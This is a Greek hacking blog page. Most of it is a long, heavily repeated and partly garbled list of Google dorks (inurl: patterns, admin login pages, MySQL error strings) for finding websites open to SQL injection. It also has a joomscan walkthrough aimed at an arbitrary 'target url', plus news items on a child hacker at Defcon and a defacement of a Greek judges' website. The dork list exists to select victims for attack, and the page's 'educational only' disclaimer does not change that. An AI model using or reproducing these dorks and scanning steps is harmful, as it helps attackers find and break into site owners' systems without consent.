!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Τετάρτη 1 Μαΐου 2013

Λίστα dorks για sql injection...


Γειά σας... Σε αυτό το tutorial θα σας παρουσιάσω μερικά dorks τα οποία μπορούμε να τα βάλουμε στο google και να κάνουμε αναζήτηση για ευπαθείς σελίδες στην sql injection.

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Τρίτη 23 Απριλίου 2013

OWASP Joomla Security Scanner

Σε αυτό το tutorial ακολουθεί μια επίδειξη ενός ανιχνευτή αδυναμιών σελίδων και κυρίως ενός ανιχνευτή αδυναμιών Joomla. Στη συνέχεια του άρθρου θα αναλύσουμε τι είναι το Joomla καθώς και όλη τη διαδικασία που ακολουθούμε με τη χρήση του Backtrack 5 R3 έτσι ώστε να ανακαλύψουμε αδυναμίες ενός Joomla site.

Τι είναι το Joomla;

Το Joomla είναι ένα CMS (Content Management System) ή Σύστημα Διαχείρισης Περιεχομένου στα Ελληνικά το οποίο ουσιαστικά είναι ένα έτοιμο προγραμματιστικά site στο οποίο ο καθένας δίνει τις δικές του ρυθμίσεις και μπορεί να επέμβει εμφανισιακά είτε βάζοντας δικά του templates είτε πειράζοντας μόνος του το template που έχει.
Όπως πολλά παρόμοια λογισμικά, έτσι και το Joomla συχνά υποφέρει από προβλήματα ασφάλειας τα οποία τις περισσότερες φορές δεν είναι τόσο σοβαρά. Ένα παράδειγμα: Το Jsupport είναι ένα extension που μπορεί να χρησιμοποιηθεί στο Joomla. Βοηθάει τον δημιουργό του Joomla site να χειρίζεται FAQs και comments. Μία ευπάθεια του Jsupport αφορούσε την απουσία ελέγχου της τιμής της μεταβλητής “alpha”. Κάποιος κακόβουλος χρήστης θα μπορούσε να δώσει ως τιμή της “alpha” ένα SQL query και έτσι να επέμβει στη ΒΔ της εφαρμογής (SQL injection). Αυτό ήταν δυνατό, καθώς η μεταβλητή “alpha” ήταν η σύνδεση του κώδικα του Jsupport με τη ΒΔ.

Πώς λειτουργεί;

Το Joomla! εγκαθίσταται σε έναν κεντρικό υπολογιστή, τον web server. Ο χρήστης, εσείς δηλαδή, έχετε πρόσβαση στο περιβάλλον διαχείρισης μέσω ενός browser, όπως είναι ο Internet Explorer ή ο Firefox.
Από τη στιγμή που είστε εσείς ο διαχειριστής, μπορείτε να προσθέσετε οποιοδήποτε κείμενο ή γραφικό,και έτσι να δημιουργήσετε τις ιστοσελίδες σας.

Ας αρχίσουμε:


Βήμα 1ο: Ανοίγω ένα τερματικό και γράφω: cd /pentest/web/joomscan/ Αν δεν έχετε το Backtrack τότε σε περιβάλλον linux το κατεβάζετε από το σύνδεσμο που δίνεται εδώ.

Βήμα 2ο: Στη συνέχεια γράφω ls και εντοπίζω το joomscan.pl

Βήμα 3ο: Μετά βεβαιώνομαι ότι η url που έχω στα χέρια μια για έλεγχω ότι είναι joomla. Απλά θα πρέπει να κάνω έλεγχο στο google με τα dorks που δίνονται στη σελίδα εδώ.

Βήμα 4ο: Τώρα γράφω ./joomscan.pl -u <target url> όπως φαίνεται στην παρακάτω εικόνα.





Βήμα 5ο: Όπως φαίνεται στην εικόνα το script πρώτα ελέγχει αν ο στόχος μας έχει κάποιο Anti-Scanner πρόγραμμα.

Βήμα 6ο: Στη συνέχεια προσπαθεί να ανιχνεύσει την ύπαρξη Firewall, ακολουθεί την ακριβή τοποθεσία του στόχου, ελέγχει την έκδοση και τέλος αρχίζει το σάρωμα.

Βήμα 7ο: Η url που χρησιμοποίησα στο παράδειγμα είναι απλώς ένα παράδειγμα και το script δε θα μας επιστρέψει συγκεκριμένα αποτελέσματα.

Βήμα 10ο: Όπως φαίνεται στη συνέχεια το scanner μας θα αρχίσει μόνο του να κάνει έλεγχο για αδυναμίες ένάντια στο site. Τέλος καθώς θα περνάνε τα δευτερόλεπτα θα μας βγάλει αρκετά αποτελεσματα αδυναμιών που υπάρχουν στο στόχο μας.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Δευτέρα 22 Απριλίου 2013

10χρονη Hacker μιλάει στο συνέδριο Defcon 19

«Χακερίτσα» ετών δέκα και μάλιστα βραβευμένη! Ο λόγος για τη CyFi, μια μικρή από τις ΗΠΑ, η οποία σε ηλικία που θα έπρεπε να παίζει με τις κούκλες της, έχει ήδη ανακαλύψει ένα άγνωστο μέχρι πριν από λίγο καιρό κενό ασφαλείας στα iPhones και τα Androids.

Η μικρή από την Καλιφόρνια είναι ένα από τα πολλά «κλωσοπουλάκια» του hacking που συμμετείχαν στο «παιδικό εργαστήρι» του Defcon, του μεγάλου συνεδρίου των χάκερ, το οποίο γίνεται κάθε χρόνο στο Λας Βέγκας.

Οπως φαίνεται, οι χάκερ ξεκινάνε πια από το… νηπιαγωγείο, προφανώς υπό την καθοδήγηση των γονιών τους, οι οποίοι δεν έχουν πρόβλημα να δηλώσουν υπερήφανοι για το γεγονός ότι τα βλαστάρια τους προοδεύουν σε αυτόν τον τομέα που ακροβατεί μεταξύ νόμου και παρανομίας.

Ενδεικτικό αυτής της εξέλιξης είναι ότι το ετήσιο συνέδριο των χάκερ Defcon εγκαινίασε φέτος το πρώτο πρόγραμμά του για παιδιά από 8 έως 16 ετών, στο οποίο παρακολούθησαν προσαρμοσμένες στην ηλικία τους παρουσιάσεις για μεθόδους hacking, αλλά και για το τι επιτρέπει ο νόμος.

Τα μέλη της νέας γενιάς χάκερ, των οποίων τα πόδια πολλές φορές κρέμονταν από τις καρέκλες όπου κάθονταν για να παρακολουθήσουν τις εργασίες του συνεδρίου, ακολουθούσαν τις προηγούμενες χρονιές τους γονείς τους. Τώρα, με το Defcon Kids, έχουν τη δυνατότητα ενημέρωσης περί hacking κομμένης και ραμμένης στα μέτρα τους.

«Πολλοί από εμάς που ερχόμαστε στο Defcon εδώ και περίπου δύο δεκαετίες… είμαστε πιο ώριμοι πια. Ας το θέσω έτσι» δηλώνει γελώντας ο Κρις Χοφ, ιδρυτής του HacKid και προσθέτει ότι πολλοί από τους χάκερ έχουν δικά τους παιδιά πια.

Η ΣΤΡΑΤΟΛΟΓΗΣΗ

Ακριβώς επειδή το μυαλό των παιδιών είναι πολύ εύπλαστο, έσπευσαν να εκμεταλλευτούν την ευκαιρία και οι ομοσπονδιακές αρχές των ΗΠΑ. Κλιμάκιό τους που βρισκόταν στο συνέδριο προκειμένου να στρατολογήσει μερικούς από τους πιο επιδέξιους χάκερ του κόσμου, πλησίασε τα παιδιά με έξυπνο και διασκεδαστικό τρόπο. Στελέχη της Εθνικής Υπηρεσίας Ασφαλείας των ΗΠΑ τους παρουσίασαν ένα μηχάνημα του Β’ Παγκοσμίου Πολέμου στο οποίο βασίζονταν τότε οι πράκτορες για να αποκρυπτογραφήσουν μηνύματα.

Τη σημασία της εισαγωγής των παιδιών στην κοινότητα των χάκερ και τη διδασκαλία να ξεχωρίζουν ανάμεσα στο ηθικό και το ανήθικο hacking, υπογραμμίζει ο Ρέι Αγερς, υπεύθυνος ασφαλείας πληροφορικών συστημάτων εταιρείας κοινής ωφελείας. Ειδικά αυτήν την εποχή που το εγκληματικό hacking αποτελεί τη μεγαλύτερη απειλή για τις κυβερνητικές οργανώσεις και τις μεγάλες εταιρείες παγκοσμίως.

«ΜΗΝ ΚΑΝΕΤΕ ΑΝΟΗΤΑ ΛΑΘΗ»

«Σας ζηλεύω κατά κάποιον τρόπο» είπε ευθέως στους μαθητευόμενους χάκερ ο «Dark Tangent», κατά κόσμον Τζεφ Μος, ο οποίος ωστόσο τους προειδοποίησε και για τους κινδύνους: «Υπάρχουν κάποιοι νόμοι τους οποίους δεν πρέπει να παραβιάζουμε εμείς οι χάκερ. Μπορεί να μπερδέψετε άσχημα τη ζωή σας, γι’ αυτό μην κάνετε ανόητα λάθη». Πάντως, ο Χοφ είναι πολύ υπερήφανος που τα παιδιά του, η επτάχρονη και η δεκάχρονη κόρη του, έχουν… μητρική την ψηφιακή γλώσσα και το hacking στο DNA τους.

Σε αυτήν την κατηγορία ανήκει και η CyFi. Η μικρή ανακάλυψε, όπως εξηγεί, το σημαντικό κενό ασφαλείας στα smartphones παίζοντας με το δικό της. «Ηταν δύσκολο να κάνω πρόοδο στο παιχνίδι, γιατί χρειαζόταν να περάσει χρόνος προκειμένου να συγκεντρώσω πόντους. Γι’ αυτό σκέφτηκα “γιατί να μην αλλάξω την ώρα”; Ελέγχοντας, λοιπόν, τον χρόνο κατάλαβα ότι μπορούσα να κάνω πολλά πράγματα» αποκαλύπτει η 10χρονη. Αν και κάποιες εφαρμογές του κινητού της είχαν μέτρα ασφαλείας απέναντι σε τέτοιες παρεμβάσεις, η CyFi κατάφερε να τα παρακάμψει.

Οι ενήλικες ειδικοί επιβεβαίωσαν το κενό ασφαλείας που βρήκε η μικρή και το οποίο, όπως αποδείχθηκε, αποτελεί κερκόπορτα για σοβαρές πράξεις «πειρατείας» στα κινητά. Πάντως, με αυτήν την ανακάλυψη κέρδισε στον πρώτο διαγωνισμό DefCon Kids, στον οποίο το χρηματικό έπαθλο είναι μικρό, μόλις εκατό δολάρια, αλλά η ηθική ικανοποίηση μεγάλη.

Ψάχνουν για κελεπούρια

Στην Πόλη της Αμαρτίας, όπου πραγματοποιήθηκε το Defcon το περασμένο Σαββατοκύριακο, οι αρχές ασφαλείας είχαν στήσει δόκανο όχι για να τιμωρήσουν τους «αμαρτωλούς» χάκερ, αλλά για να τους πείσουν ότι αξίζει τον κόπο να ενταχθούν στις δικές τους τάξεις. Τους ενημέρωναν για τις θέσεις που υπάρχουν στις ομοσπονδιακές αρχές ασφαλείας και για τους μισθούς που θα έχουν αν γίνουν «white hats», δηλαδή νόμιμοι. Από την πλευρά τους, οι χάκερ έκαναν ένα άλλο είδος ενημέρωσης στους ομοσπονδιακούς πράκτορες, όχι και τόσο ευχάριστο.

Συγκεκριμένα, περιέγραψαν πώς είναι δυνατό με έναν υπολογιστή από απόσταση ένας «black hat» χάκερ -κακός δηλαδή- να μπει στα συστήματα ενός εργοστασίου παραγωγής ενέργειας και το ανατινάξει σκοτώνοντας κόσμο ή να ζητάει υπέρογκα ποσά από τους υπευθύνους προκειμένου να μην προκαλέσει την καταστροφή.

Κυβερνοεπίθεση του Hacker [PAOK] στην ιστοσελίδα Ελλήνων Δικαστών!

logeion upatras paok greekhackingscene [ΑΠΟΚΛΕΙΣΤΙΚΟ] Κυβερνοεπίθεση του [PAOK] στην ιστοσελίδα Ελλήνων Δικαστών!Νέα ισχυρή κυβερνοεπίθεση με παράλληλη ανάρτηση πολιτικού μηνύματος-προκήρυξης πραγματοποιήθηκε πρίν από λίγο εναντίον της ιστοσελίδας Ελληνων Δικαστών! Συγκεκριμένα μετα απο ενα μικρό χρονικό διάστημα απουσίας, ο γνωστός και ιδιαίτερα “δραστήριος” hacker [PAOK] επανέκαμψε με αλλοίωση της ιστοσελίδας dikastes.gr!
Η ιστοσελίδα dikastes.gr έχει ώς στόχο να υπάρχει άμεση και απρόσκοπτη επαφή μεταξύ Δικαστικών και Εισαγγελέων ενώ ταυτόχρονα παρέχει αντικειμενική, σωστή και γρήγορη ενημέρωση για όλα τα θέματα που απασχολούν δικαστικούς και εισαγγελικους λειτουργούς. Μέλη της ιστοσελίδας είναι Αρεοπαγίτες, <…>
Πρόεδροι Πρωτοδικών, Ειρηνοδίκες, Εφέτες κ.α. από το σύνολο της ιεραρχίας της Δικαιοσύνης.
Σύμφωνα με  ηλεκτρονικό μήνυμα που κοινοποιήθηκε στο SecNews, ο [PAOK] δήλωσε ότι επέλεξε την εν λόγω ιστοσελίδα για να αποστείλει όπως αναφέρει σοβαρό μήνυμα προς τους αρμόδιους αποδέκτες
Όπως διαπίστωσε η τεχνική ομάδα του SecNews, η κεντρική ιστοσελίδα έχει αλλοιωθεί και παρουσιάζει την παρακάτω μορφή αυτή την στιγμή, μετά την παραβίαση της ιστοσελίδας από τον [P.A.O.K]:
dikastes.defacement [ΑΠΟΚΛΕΙΣΤΙΚΟ] Κυβερνοεπίθεση του [PAOK] στην ιστοσελίδα Ελλήνων Δικαστών!
Ο [P.A.O.K] επιθυμεί να ακουστεί, όπως αναφέρει, “η οργή της Ελληνικής νεολαίας για την μη τιμωρία των υπευθύνων για το χάλι που ζούμε”. Επιπλέον εκφράζει τις απόψεις του για την δίκη του Τσοχατζόπουλου που ξεκινά αύριο. Διαβάστε παρακάτω το μήνυμα-προκήρυξη του:

Συνεχίστε το έργο που ξεκινήσατε …..είμαστε μαζί σας!

